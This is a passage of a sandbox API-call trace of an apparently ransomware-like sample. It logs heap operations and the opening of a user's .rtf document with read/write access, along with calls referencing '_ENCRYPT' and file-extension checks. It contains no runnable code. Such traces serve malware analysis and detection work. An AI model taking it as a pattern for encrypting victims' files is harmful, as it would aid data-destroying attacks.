HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pcrlz1tseuav.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=92, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb8) returned 0x7c5448 [0033.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=92, lpWideCharStr=0x7c5448, cchWideChar=92 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf") returned 92 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c5508 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.694] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.695] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0033.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0033.696] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.696] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.697] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0033.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cd60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.697] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0033.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.698] CloseHandle (hObject=0x140) returned 1 [0033.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.698] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.698] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.699] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.699] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.699] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.699] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.699] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.699] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.699] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.699] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.699] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b03a510, ftCreationTime.dwHighDateTime=0x1d5bf45, ftLastAccessTime.dwLowDateTime=0x281b25a0, ftLastAccessTime.dwHighDateTime=0x1d5bbff, ftLastWriteTime.dwLowDateTime=0x281b25a0, ftLastWriteTime.dwHighDateTime=0x1d5bbff, nFileSizeHigh=0x0, nFileSizeLow=0x17561, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pCRLZ1TsEuAv.rtf", cAlternateFileName="PCRLZ1~1.RTF")) returned 0x7c20c0 [0033.699] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.699] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.699] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf", lpFindFileData=0x6ae8c0 | out: 